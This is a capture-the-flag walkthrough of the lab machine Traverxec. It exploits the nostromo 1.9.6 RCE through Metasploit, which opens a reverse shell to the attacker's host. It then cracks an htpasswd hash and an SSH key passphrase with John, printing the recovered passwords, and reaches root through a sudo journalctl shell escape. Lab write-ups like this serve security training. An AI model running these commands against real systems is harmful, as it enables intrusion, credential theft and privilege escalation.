Traverxec

Traverexec is a easy difficulty linux machine that's a good introduction to web to host exploitation as well as SSH usage

Recon

we start off by scanning Traverexec's IP 10.10.10.165 with nmap

nmap -T4 -A -v 10.10.10.165

From our results we get the following ports and services

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC

Right off we see that it's only running 2 services and we have potentially have the server service name nostromo

We can use searchsploit to check if there are any existing exploits for nostromo V1.9.6 using searchsploit nostromo

----------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                               |  Path
                                                                                                                             | (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Nostromo - Directory Traversal Remote Command Execution (Metasploit)                                                         | exploits/multiple/remote/47573.rb
nostromo 1.9.6 - Remote Code Execution                                                                                       | exploits/multiple/remote/47837.py
nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution                                                         | exploits/linux/remote/35466.sh
----------------------------------------------------------------------------------------------------------------------------- ----------------------------------------

Perfect we find that there's a RCE exploit for this version of nostromo.

Now lets fire up Metsploit Framework with msfconsole and search for the exploit search nostromo 

Matching Modules
================

   #  Name                                   Disclosure Date  Rank  Check  Description
   -  ----                                   ---------------  ----  -----  -----------
   0  exploit/multi/http/nostromo_code_exec  2019-10-20       good  Yes    Nostromo Directory Traversal Remote Command Execution

Perfect! msf has the exploit we want to use now lets select and configure it

Exploit

use exploit/multi/http/nostromo_code_exec
set LHOST tun0
set RHOST 10.10.10.165
set RPORT 80
run

after a few seconds we should get the following

[*] Started reverse TCP handler on 10.10.15.64:4444 
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (10.10.15.64:4444 -> 10.10.10.165:59272) at 2020-04-11 02:34:42 -0700

Great! we have shell, unfortunately it's a limited shell but we can fix that up by upgrading it to a full PTY shell with python -c 'import pty:pty.spawn("/bin/bash")'

Now with a full shell lets enumerate some more seeing as we are just a low privelage shell right now, we need to get user. To do this we will get LinEnum https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh

Once we have it, it's time to get it on the victim to do this we'll fire up python -m simpleHTTPServer and on the victim we'll do wget IP Port/LinEnum.sh once we have it we need to set it's permissions with chmod +x LinEnum.sh and then run it ./LinEnum.sh

Upon completetion we find one line that stands out

[-] htpasswd found - could contain passwords:
/var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

We got a password hash!, coming back to our local machine, we'll put that hash into a file and run it through John 

touch hash
nano hash
john --wordlist=/root/Downloads/Dic/rockyou.txt hash
Nowonly4me       (david)

Upon completion we get the password Nowonly4me

Wee also see that within /home/david/public_wwwcontains a folder protected-file-areawhich is protected by.htaccess checking nostromo documentation http://www.nazgul.ch/dev/nostromo_man.html we see that there is yet another director we can access ~david trying to access this directory gives us the following page

Doesn't look very interesting does it? well typing in the url 10.10.10.165/~david/protected-file-area gives us a auth screen and we already have the credentials for it david:Nowonly4me it takes us to a index page where we can download backup-ssh-identity-files.tgz

Once downloaded we can extract the ssh keys it gives us the following files

/david/.ssh/
/david/.ssh/authorized_keys
/david/.ssh/id_rsa
/david/.ssh/id_rsa.pub

Unfortunately the id_rsa is encrypted but luckily we can pass it through john

python/usr/share/john/ssh2john.py ~/HTB/Traverexec/home/david/.ssh/id_rsa > ~/HTB/Traverexec/ssh.txt
john ssh.txt --wordlist=~/Downloads/Dic/rockyou.txt
hunter           (/root/HTB/Traverexec/home/david/.ssh/id_rsa)

Great! we got the password hunter we can now use this with id_rsa to connect via ssh

ssh -i id_rsa david@10.10.10.165

And With that we have User!

Post Exploitation

Checking David's home dir we find 

david@traverxec:~/bin$ ls -ahlrs
total 16K
4.0K -rwx------ 1 david david  363 Oct 25 16:26 server-stats.sh
4.0K -r-------- 1 david david  802 Oct 25 16:26 server-stats.head
4.0K drwx--x--x 5 david david 4.0K Oct 25 17:02 ..
4.0K drwx------ 2 david david 4.0K Oct 25 16:26 .

server-stats.head Gives us a banner not much useful, however checking server-stats.sh We get the following 

#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

The last line /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat shows us that journalctl is running as root, so can we exploit this?

Yes we can! Checking GTFOBins https://gtfobins.github.io/gtfobins/journalctl/ we find that simply typing !/bin/sh from within journalctl can give us root access! /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service

Apr 24 01:05:26 traverxec sudo[807]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Apr 24 01:05:26 traverxec sudo[807]: www-data : command not allowed ; TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=list
Apr 24 01:48:40 traverxec sudo[1574]: pam_unix(sudo:auth): conversation failed
Apr 24 01:48:40 traverxec sudo[1574]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Apr 24 01:48:40 traverxec sudo[1574]: www-data : command not allowed ; TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=list
!/bin/sh

root@traverexec:/home/david/bin# cd /root/
root@traverexec:~# cat root.txt

Useful Links

LogoGTFOBins
nazgul.ch

PreviousRegistryNextMango

Last updated